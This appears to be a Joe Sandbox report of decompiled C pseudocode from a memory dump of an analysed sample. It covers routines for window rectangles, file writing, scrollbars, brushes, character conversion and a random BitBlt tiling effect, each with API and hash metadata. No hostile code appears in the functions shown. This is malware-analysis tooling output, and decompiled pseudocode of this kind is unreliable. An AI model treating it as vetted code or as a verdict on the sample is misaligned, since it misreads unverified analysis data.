                                            					_v8 =  *((intOrPtr*)(_t83 + 4));
                                            					GetWindowRect(GetDesktopWindow(),  &_v60);
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_t87 =  *((intOrPtr*)(_t128 + 0x8c));
                                            					asm("movsd");
                                            					asm("movsd");
                                            					if(_t87 == 0xa || _t87 == 0xc) {
                                            						_v44.left =  *((intOrPtr*)(_t128 + 0x58)) -  *((intOrPtr*)(_t128 + 0x60)) - _v12 + _v44.right;
                                            						_v44.top =  *((intOrPtr*)(_t128 + 0x5c)) -  *((intOrPtr*)(_t128 + 0x64)) - _v8 + _v44.bottom;
                                            						__eflags = IntersectRect( &_v28,  &_v60,  &_v44);
                                            						if(__eflags != 0) {
                                            							 *((intOrPtr*)(_t128 + 0x38)) =  *((intOrPtr*)(_t128 + 0x40)) - _v12;
                                            							_t106 =  *((intOrPtr*)(_t128 + 0x44)) - _v8;
                                            							__eflags = _t106;
                                            							 *((intOrPtr*)(_t128 + 0x3c)) = _t106;
                                            							 *(_t128 + 0x48) = _v44.left;
                                            							 *((intOrPtr*)(_t128 + 0x4c)) = _v44.top;
                                            						}
                                            					} else {
                                            						_v44.right =  *((intOrPtr*)(_t128 + 0x60)) -  *((intOrPtr*)(_t128 + 0x58)) + _v44.left + _v12;
                                            						_v44.bottom =  *((intOrPtr*)(_t128 + 0x64)) -  *((intOrPtr*)(_t128 + 0x5c)) + _v44.top + _v8;
                                            						_t120 = IntersectRect( &_v28,  &_v60,  &_v44);
                                            						_t152 = _t120;
                                            						if(_t120 != 0) {
                                            							 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x38)) + _v12;
                                            							 *((intOrPtr*)(_t128 + 0x44)) =  *((intOrPtr*)(_t128 + 0x3c)) + _v8;
                                            							 *((intOrPtr*)(_t128 + 0x50)) = _v44.right;
                                            							 *((intOrPtr*)(_t128 + 0x54)) = _v44.bottom;
                                            						}
                                            					}
                                            					 *((intOrPtr*)(_t128 + 4)) = _a4;
                                            					 *((intOrPtr*)(_t128 + 8)) = _a8;
                                            					return E0042007A(_t128, _t152, 0);
                                            				}
                                            				if(_t138 == 0xb) {
                                            					__eflags = _t138 - 0xa;
                                            					if(_t138 != 0xa) {
                                            						_t14 = __ecx + 0x30;
                                            						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t79;
                                            						__eflags =  *_t14;
                                            						goto L9;
                                            					}
                                            					goto L7;
                                            				} else {
                                            					_t143 = 0x22;
                                            					if(_t138 != 0xc) {
                                            						_t8 = __ecx + 0x34;
                                            						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t132;
                                            						__eflags =  *_t8;
                                            					} else {
                                            						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t132;
                                            					}
                                            					_t81 =  *((intOrPtr*)(_t128 + 0x34)) -  *((intOrPtr*)(_t128 + 0x2c));
                                            					goto L10;
                                            				}
                                            			}




















                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$IntersectWindow$Desktop
                                            • String ID:
                                            • API String ID: 123605412-0
                                            • Opcode ID: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
                                            • Instruction ID: 7ef3134b71351d20188b2f6e6573302e8d5814b45845c27d755b710e50fb3d9e
                                            • Opcode Fuzzy Hash: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
                                            • Instruction Fuzzy Hash: 43517272A00209DFCF54DFA8D5C4ADEBBF5BF08314B1441A6E905EB20AE734E986CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040AF6B(long _a4, void* _a8, long _a12) {
                                            				intOrPtr* _v8;
                                            				long _v12;
                                            				long _v16;
                                            				signed int _v20;
                                            				void _v1048;
                                            				void** _t66;
                                            				signed int _t67;
                                            				intOrPtr _t69;
                                            				signed int _t70;
                                            				intOrPtr _t71;
                                            				signed int _t73;
                                            				signed int _t80;
                                            				int _t85;
                                            				long _t87;
                                            				intOrPtr* _t91;
                                            				intOrPtr _t97;
                                            				struct _OVERLAPPED* _t101;
                                            				long _t103;
                                            				signed int _t105;
                                            				struct _OVERLAPPED* _t106;
                                            
                                            				_t101 = 0;
                                            				_v12 = 0;
                                            				_v20 = 0;
                                            				if(_a12 != 0) {
                                            					_t91 = 0x43b520 + (_a4 >> 5) * 4;
                                            					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
                                            					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
                                            					if(__eflags != 0) {
                                            						E0040AE93(__eflags, _a4, 0, 2);
                                            					}
                                            					_t66 =  *_t91 + _t105;
                                            					__eflags = _t66[1] & 0x00000080;
                                            					if((_t66[1] & 0x00000080) == 0) {
                                            						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
                                            						__eflags = _t67;
                                            						if(_t67 == 0) {
                                            							_a4 = GetLastError();
                                            						} else {
                                            							_a4 = _t101;
                                            							_v12 = _v16;
                                            						}
                                            						L15:
                                            						_t69 = _v12;
                                            						__eflags = _t69 - _t101;
                                            						if(_t69 != _t101) {
                                            							_t70 = _t69 - _v20;
                                            							__eflags = _t70;
                                            							return _t70;
                                            						}
                                            						__eflags = _a4 - _t101;
                                            						if(_a4 == _t101) {
                                            							L25:
                                            							_t71 =  *_t91;
                                            							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
                                            							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
                                            								L27:
                                            								 *((intOrPtr*)(E00406F78())) = 0x1c;
                                            								_t73 = E00406F81();
                                            								 *_t73 = _t101;
                                            								L24:
                                            								return _t73 | 0xffffffff;
                                            							}
                                            							__eflags =  *_a8 - 0x1a;
                                            							if( *_a8 == 0x1a) {
                                            								goto L1;
                                            							}
                                            							goto L27;
                                            						}
                                            						_t106 = 5;
                                            						__eflags = _a4 - _t106;
                                            						if(_a4 != _t106) {
                                            							_t73 = E00406F05(_a4);
                                            						} else {
                                            							 *((intOrPtr*)(E00406F78())) = 9;
                                            							_t73 = E00406F81();
                                            							 *_t73 = _t106;
                                            						}
                                            						goto L24;
                                            					}
                                            					__eflags = _a12 - _t101;
                                            					_v8 = _a8;
                                            					_a4 = _t101;
                                            					if(_a12 <= _t101) {
                                            						goto L25;
                                            					} else {
                                            						goto L6;
                                            					}
                                            					do {
                                            						L6:
                                            						_t80 =  &_v1048;
                                            						do {
                                            							__eflags = _v8 - _a8 - _a12;
                                            							if(_v8 - _a8 >= _a12) {
                                            								break;
                                            							}
                                            							_v8 = _v8 + 1;
                                            							_t97 =  *_v8;
                                            							__eflags = _t97 - 0xa;
                                            							if(_t97 == 0xa) {
                                            								_v20 = _v20 + 1;
                                            								 *_t80 = 0xd;
                                            								_t80 = _t80 + 1;
                                            								__eflags = _t80;
                                            							}
                                            							 *_t80 = _t97;
                                            							_t80 = _t80 + 1;
                                            							__eflags = _t80 -  &_v1048 - 0x400;
                                            						} while (_t80 -  &_v1048 < 0x400);
                                            						_t103 = _t80 -  &_v1048;
                                            						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
                                            						__eflags = _t85;
                                            						if(_t85 == 0) {
                                            							_a4 = GetLastError();
                                            							break;
                                            						}
                                            						_t87 = _v16;
                                            						_v12 = _v12 + _t87;
                                            						__eflags = _t87 - _t103;
                                            						if(_t87 < _t103) {
                                            							break;
                                            						}
                                            						__eflags = _v8 - _a8 - _a12;
                                            					} while (_v8 - _a8 < _a12);
                                            					_t101 = 0;
                                            					__eflags = 0;
                                            					goto L15;
                                            				}
                                            				L1:
                                            				return 0;
                                            			}
























                                            APIs
                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000001,?,?), ref: 0040B032
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
                                            • Instruction ID: 01ac4f6acfc5913959f88f192ecd96d6d2ffcc37b6012a8bce105fbf1c838ef3
                                            • Opcode Fuzzy Hash: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
                                            • Instruction Fuzzy Hash: 21519371A00209EFCB11DF68C844B9E7BB4EF41344F1581BAE825AB291D734DA51CB9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E00427B02(void* __ecx, int _a4, int _a8, int _a12) {
                                            				intOrPtr _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				char _v32;
                                            				intOrPtr _t60;
                                            				intOrPtr _t61;
                                            				intOrPtr _t66;
                                            				int _t68;
                                            				void* _t69;
                                            				intOrPtr _t75;
                                            				intOrPtr* _t78;
                                            				signed short _t94;
                                            				intOrPtr* _t107;
                                            				signed int _t110;
                                            				int* _t111;
                                            				intOrPtr _t113;
                                            				void* _t114;
                                            
                                            				_t114 = __ecx;
                                            				if( *((intOrPtr*)(__ecx + 0xec)) != 0) {
                                            					_t89 = _a4;
                                            					_t60 =  *((intOrPtr*)(__ecx + 0x90));
                                            					 *(__ecx + 0xf8) = 1;
                                            					_t110 = _a4 + _a4 * 4 << 3;
                                            					 *((intOrPtr*)(_t60 + 0x20)) =  *((intOrPtr*)(_t60 + _t110 + 0x20));
                                            					 *((intOrPtr*)(_t60 + 0x24)) =  *((intOrPtr*)(_t60 + _t110 + 0x24));
                                            					_t61 =  *((intOrPtr*)(__ecx + 0x90));
                                            					 *((intOrPtr*)(_t61 + 0x10)) =  *((intOrPtr*)(_t61 + _t110 + 0x10));
                                            					 *((intOrPtr*)(_t61 + 0x14)) =  *((intOrPtr*)(_t61 + _t110 + 0x14));
                                            					E00427C71(__ecx,  *((intOrPtr*)(__ecx + 0xf4)) + _t89, 0);
                                            					E0042722C(__ecx,  *((intOrPtr*)(_t61 + _t110 + 0x14)), __eflags, 0);
                                            					_t66 =  *((intOrPtr*)(_t114 + 0x90));
                                            					_t111 = _t110 + _t66 + 0x18;
                                            					_a8 = MulDiv(_a8,  *_t111,  *(_t110 + _t66 + 0x1c));
                                            					_t68 = MulDiv(_a12,  *_t111, _t111[1]);
                                            					_t107 =  *((intOrPtr*)(_t114 + 0x90));
                                            					_a8 = _a8 +  *_t107;
                                            					_t69 = _t68 +  *((intOrPtr*)(_t107 + 4));
                                            					__eflags = _t69;
                                            					_push(_t69);
                                            					_push(_a8);
                                            					return E0041B0C1(_t114,  *((intOrPtr*)(_t107 + 4)));
                                            				}
                                            				 *(__ecx + 0xf8) =  *(__ecx + 0xe8);
                                            				ShowScrollBar( *(__ecx + 0x1c), 0, 0);
                                            				_t75 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x114)))) + 0x5c));
                                            				_t94 =  *((intOrPtr*)(_t75 + 0x1e));
                                            				if(_t94 >= 0x8000) {
                                            					L3:
                                            					_a4 = 0;
                                            					L4:
                                            					ShowScrollBar( *(_t114 + 0x1c), 1, _a4);
                                            					if(_a4 != 0) {
                                            						_t78 =  *((intOrPtr*)(_t114 + 0x114));
                                            						_v28 = 3;
                                            						_t113 = 1;
                                            						_v24 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1c) & 0x0000ffff;
                                            						_v20 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1e) & 0x0000ffff;
                                            						_v16 = _t113;
                                            						if(E00415006(_t114, _t113,  &_v32, 0) == 0) {
                                            							E00414F60(_t114, _t113, _v24, _v20, 0);
                                            						}
                                            					}
                                            					return E00427C71(_t114,  *((intOrPtr*)(_t114 + 0xf4)), 1);
                                            				}
                                            				_a4 = 1;
                                            				if((_t94 & 0x0000ffff) - ( *(_t75 + 0x1c) & 0x0000ffff) <= 0x7fff) {
                                            					goto L4;
                                            				}
                                            				goto L3;
                                            			}

                                            APIs
                                            • ShowScrollBar.USER32(?,00000000,00000000), ref: 00427B32
                                            • ShowScrollBar.USER32(?,00000001,?), ref: 00427B6D
                                            • MulDiv.KERNEL32(?,?,?), ref: 00427C40
                                            • MulDiv.KERNEL32(?,?,?), ref: 00427C4D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ScrollShow
                                            • String ID:
                                            • API String ID: 3611344627-0
                                            • Opcode ID: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
                                            • Instruction ID: e36dfcb719c56f5c0c47cfadceb7236ddc00b612851f65575ceccfe99fb50706
                                            • Opcode Fuzzy Hash: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
                                            • Instruction Fuzzy Hash: A1417C70600615AFCB14DF29D880EAABBF5FF88308F10856EF9199B361D774E851DB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E0042007A(void* __ecx, void* __eflags, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				struct tagRECT _v40;
                                            				void* __ebp;
                                            				intOrPtr _t56;
                                            				signed char _t60;
                                            				signed char _t65;
                                            				intOrPtr _t67;
                                            				signed int _t73;
                                            				void* _t76;
                                            				intOrPtr _t84;
                                            				intOrPtr _t95;
                                            
                                            				_t56 = 1;
                                            				_t76 = __ecx;
                                            				_v24 = _t56;
                                            				_v20 = _t56;
                                            				_push(GetStockObject(0));
                                            				_t84 = E0041A5FC();
                                            				_v16 = _t84;
                                            				_v8 = E00423BE7(__eflags);
                                            				_t60 =  *(_t76 + 0x74);
                                            				_v12 = _t84;
                                            				if((0x0000a000 & _t60) == 0) {
                                            					__eflags = _t60 & 0x00000050;
                                            					if(__eflags == 0) {
                                            						_v24 = GetSystemMetrics(0x20) - 1;
                                            						_v20 = GetSystemMetrics(0x21) - 1;
                                            						_t65 =  *(_t76 + 0x78);
                                            						__eflags = 0x0000a000 & _t65;
                                            						if((0x0000a000 & _t65) == 0) {
                                            							L7:
                                            							__eflags = _t65 & 0x00000050;
                                            							if(__eflags == 0) {
                                            								L10:
                                            							} else {
                                            								__eflags =  *(_t76 + 0x7c);
                                            								if(__eflags == 0) {
                                            									goto L10;
                                            								} else {
                                            									goto L9;
                                            								}
                                            							}
                                            						} else {
                                            							__eflags =  *(_t76 + 0x7c);
                                            							if(__eflags != 0) {
                                            								goto L7;
                                            							}
                                            						}
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_v12 = _v8;
                                            					} else {
                                            						goto L2;
                                            					}
                                            				} else {
                                            					L2:
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            				}
                                            				if(_a4 != 0) {
                                            					_v20 = 0;
                                            					_v24 = 0;
                                            				}
                                            				_t95 =  *0x439c3c; // 0x1
                                            				if(_t95 != 0 && ( *(_t76 + 0x75) & 0x000000f0) != 0) {
                                            					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                                            				}
                                            				_t97 =  *(_t76 + 0x24);
                                            				_t67 = _v8;
                                            				if( *(_t76 + 0x24) == 0) {
                                            					_t67 = _v16;
                                            				}
                                            				E00423C5A( *((intOrPtr*)(_t76 + 0x84)), _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                                            				asm("movsd");
                                            				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                                            				asm("movsd");
                                            				asm("movsd");
                                            				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                                            				asm("movsd");
                                            				_t73 = 0 | _v12 == _v8;
                                            				 *(_t76 + 0x24) = _t73;
                                            				return _t73;
                                            			}

                                            APIs
                                            • GetStockObject.GDI32(00000000), ref: 00420090
                                              • Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
                                              • Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
                                              • Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F
                                            • GetSystemMetrics.USER32 ref: 004200D6
                                            • GetSystemMetrics.USER32 ref: 004200DE
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00420134
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
                                            • String ID:
                                            • API String ID: 419749085-0
                                            • Opcode ID: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
                                            • Instruction ID: e0589e39635e5819ef82d448fd258ad5fc30fad598c9d44a8e29054fd3acad8a
                                            • Opcode Fuzzy Hash: f04683a99d2cf70874936f412b73c80b9557d256e680e15b78c8faeb2f1dfe54
                                            • Instruction Fuzzy Hash: 1B413D71E006289BCF11CFA4D984BAEBBF5AF09310F514166ED10BB296D3B59E41CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0040EB45(short* _a4, char* _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
                                            				intOrPtr* _t29;
                                            				int _t30;
                                            				void* _t32;
                                            				signed int _t33;
                                            				int _t35;
                                            				signed short* _t38;
                                            				short* _t39;
                                            				intOrPtr _t41;
                                            				intOrPtr _t42;
                                            				int _t46;
                                            				signed char _t50;
                                            				char* _t53;
                                            				char* _t54;
                                            
                                            				_t53 = _a8;
                                            				if(_t53 == 0 || _a12 == 0) {
                                            					L5:
                                            					return 0;
                                            				} else {
                                            					_t50 =  *_t53;
                                            					if(_t50 != 0) {
                                            						_t29 = _a20;
                                            						if(_t29 != 0) {
                                            							_t42 =  *_t29;
                                            							_t30 =  *(_t29 + 4);
                                            						} else {
                                            							_t42 =  *0x439eec; // 0x0
                                            							_t30 =  *0x439efc; // 0x0
                                            						}
                                            						if(_t42 != 0) {
                                            							_t54 = _a16;
                                            							if( *_t54 == 0) {
                                            								_t41 =  *0x437100; // 0x43710a
                                            								if(( *(_t41 + 1 + (_t50 & 0x000000ff) * 2) & 0x00000080) == 0) {
                                            									if(MultiByteToWideChar(_t30, 9, _t53, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                                            										goto L13;
                                            									}
                                            									L21:
                                            									_t33 = E00406F78();
                                            									 *_t33 = 0x2a;
                                            									return _t33 | 0xffffffff;
                                            								}
                                            								_t46 =  *0x43730c; // 0x1
                                            								if(_a12 >= _t46) {
                                            									if(_t46 <= 1 || MultiByteToWideChar(_t30, 9, _t53, _t46, _a4, 0 | _a4 != 0x00000000) == 0) {
                                            										if(_t53[1] != 0) {
                                            											goto L19;
                                            										}
                                            										 *_t54 =  *_t54 & 0x00000000;
                                            										goto L21;
                                            									} else {
                                            										L19:
                                            										_t35 =  *0x43730c; // 0x1
                                            										return _t35;
                                            									}
                                            								}
                                            								 *_t54 = _t50;
                                            								_push(0xfffffffe);
                                            								goto L14;
                                            							}
                                            							_t54[1] = _t50;
                                            							if( *0x43730c <= 1 || MultiByteToWideChar(_t30, 9, _t54, 2, _a4, 0 | _a4 != 0x00000000) == 0) {
                                            								 *_t54 = 0;
                                            								goto L21;
                                            							} else {
                                            								 *_t54 = 0;
                                            								goto L19;
                                            							}
                                            						} else {
                                            							_t38 = _a4;
                                            							if(_t38 != 0) {
                                            								 *_t38 = _t50 & 0x000000ff;
                                            							}
                                            							L13:
                                            							_push(1);
                                            							L14:
                                            							_pop(_t32);
                                            							return _t32;
                                            						}
                                            					} else {
                                            						_t39 = _a4;
                                            						if(_t39 != 0) {
                                            							 *_t39 = 0;
                                            						}
                                            						goto L5;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000006,00000009,?,00000002,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EBC5
                                            • MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC21
                                            • MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC48
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide
                                            • String ID: qC
                                            • API String ID: 626452242-723977305
                                            • Opcode ID: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
                                            • Instruction ID: c9bfa79667547676a2f9c640e0e00b1591e9fa3c2d1d8cd3a8b3004187d1f30f
                                            • Opcode Fuzzy Hash: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
                                            • Instruction Fuzzy Hash: FC31A070204206EFDB20CF22DCC4A6A3BB5AB41711F14893EE5439A2D1E378ECA1D759
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 73%
                                            			E004040A0(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _t83;
                                            				signed int _t85;
                                            				void* _t126;
                                            				void* _t128;
                                            
                                            				if(_a40 < 4) {
                                            					_a40 = 4;
                                            				}
                                            				asm("cdq");
                                            				_v8 = _a28 / _a40 + 1;
                                            				asm("cdq");
                                            				_v12 = _a32 / _a40 + 1;
                                            				E004061D5(E00406204(0));
                                            				_t128 = _t126 + 8;
                                            				_v16 = _v8 * _v12;
                                            				while(_v16 > 0) {
                                            					_t83 = E004061E2();
                                            					asm("cdq");
                                            					_v20 = _t83 % _v8;
                                            					_t85 = E004061E2();
                                            					asm("cdq");
                                            					_v24 = _t85 % _v12;
                                            					BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v24 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v24 * _a40, 0xcc0020);
                                            					asm("cdq");
                                            					if(_v16 % 0xa == 0) {
                                            						E0040381D(_a36);
                                            						_t128 = _t128 + 4;
                                            					}
                                            					_v16 = _v16 - 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				return 1;
                                            			}

                                            APIs
                                            • _rand.LIBCMT ref: 004040F4
                                            • _rand.LIBCMT ref: 00404100
                                            • BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404155
                                            • BitBlt.GDI32(?,?,?,00CC0020,?,?,00000000,?,00CC0020), ref: 004041A9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: _rand
                                            • String ID:
                                            • API String ID: 1172538735-0
                                            • Opcode ID: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
                                            • Instruction ID: ed2ed6788aa4e0fa1879982426311b249628acefad2a4dc112bdad2b7b6bc882
                                            • Opcode Fuzzy Hash: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
                                            • Instruction Fuzzy Hash: C83107B5A00109EFCB04DF99C985EEE77B9EF9C308F118269F919A7240D634EA10CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004293D9(void* __ecx) {
                                            				INT* _t43;
                                            				CHAR* _t44;
                                            				CHAR* _t47;
                                            				CHAR* _t65;
                                            				void* _t76;
                                            				void* _t81;
                                            				void* _t83;
                                            
                                            				E00406520(E0042A890, _t81);
                                            				_t43 =  *(_t81 + 0x20);
                                            				_t65 = 0;
                                            				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x20;
                                            				_t76 = __ecx;
                                            				 *(_t81 - 0x14) = 0;
                                            				 *((intOrPtr*)(_t81 - 0x18)) = 0;
                                            				if(_t43 != 0) {
                                            					L4:
                                            					_t44 = ExtTextOutA( *(_t76 + 4),  *(_t81 + 8),  *(_t81 + 0xc),  *(_t81 + 0x10),  *(_t81 + 0x14),  *(_t81 + 0x18),  *(_t81 + 0x1c), _t43);
                                            					 *(_t81 + 0x18) = _t44;
                                            					if( *((intOrPtr*)(_t81 - 0x18)) != 0 && _t44 != 0 && (GetTextAlign( *(_t76 + 8)) & 0x00000001) != 0) {
                                            						GetCurrentPositionEx( *(_t76 + 4), _t81 - 0x20);
                                            						E0041A1BF(_t76, _t81 - 0x28,  *(_t81 - 0x20) -  *((intOrPtr*)(_t81 - 0x18)),  *((intOrPtr*)(_t81 - 0x1c)));
                                            					}
                                            					E00413206( *(_t81 - 0x14));
                                            					E00413206(_t65);
                                            					_t47 =  *(_t81 + 0x18);
                                            				} else {
                                            					if( *(_t81 + 0x1c) != 0) {
                                            						 *(_t81 - 4) = 0;
                                            						 *(_t81 - 0x14) = E004131DD( *(_t81 + 0x1c) << 2);
                                            						_t65 = E004131DD( *(_t81 + 0x1c));
                                            						 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
                                            						E0042914E(_t76, _t81 - 0x20, _t81 + 8,  *(_t81 + 0x18), _t81 + 0x1c, 0, 0, 0, 0, _t65,  *(_t81 - 0x14), _t81 - 0x18);
                                            						_t43 =  *(_t81 - 0x14);
                                            						 *(_t81 + 0x18) = _t65;
                                            						goto L4;
                                            					} else {
                                            						_t47 = 1;
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
                                            				return _t47;
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 004293DE
                                            • ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0042946C
                                            • GetTextAlign.GDI32(?), ref: 00429481
                                            • GetCurrentPositionEx.GDI32(?,?), ref: 00429492
                                            Memory Dump Source
